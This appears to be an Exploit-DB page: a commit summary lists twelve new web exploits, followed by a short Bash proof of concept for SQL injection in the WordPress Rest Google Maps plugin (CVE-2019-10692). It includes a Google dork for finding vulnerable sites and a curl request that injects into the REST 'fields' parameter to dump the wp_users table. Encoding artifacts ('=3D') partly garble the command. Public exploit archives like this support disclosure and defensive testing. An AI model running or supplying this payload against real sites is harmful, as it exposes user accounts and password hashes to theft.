5aa3bfc759
12 changes to exploits/shellcodes Comtrend AR-5387un router - Persistent XSS (Authenticated) Loan Management System 1.0 - Multiple Cross Site Scripting (Stored) Wordpress Plugin WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure Visitor Management System in PHP 1.0 - SQL Injection (Authenticated) Ultimate Project Manager CRM PRO Version 2.0.5 - SQLi (Authenticated) WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS RiteCMS 2.2.1 - Remote Code Execution (Authenticated) Mobile Shop System v1.0 - SQL Injection Authentication Bypass Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)
17 lines
No EOL
616 B
Bash
Executable file
17 lines
No EOL
616 B
Bash
Executable file
# Exploit Title: WordPress Rest Google Maps Plugin SQL Injection
|
|
# Google Dork: inurl:index.php?rest_route=3D/wpgmza/
|
|
# Date: 2020-09-09
|
|
# Exploit Author: Jonatas Fil
|
|
# Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers
|
|
# Software Link: https://wordpress.org/plugins/wp-google-maps/
|
|
# Version: < 7.11.18
|
|
# Tested on: Linux
|
|
# CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-2019-10692)
|
|
#!/bin/bash
|
|
|
|
TARGET="192.168.1.77"
|
|
|
|
curl -k --silent
|
|
"http://$TARGET/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=
|
|
fields=3D*+from+wp_users+--+-"
|
|
| jq |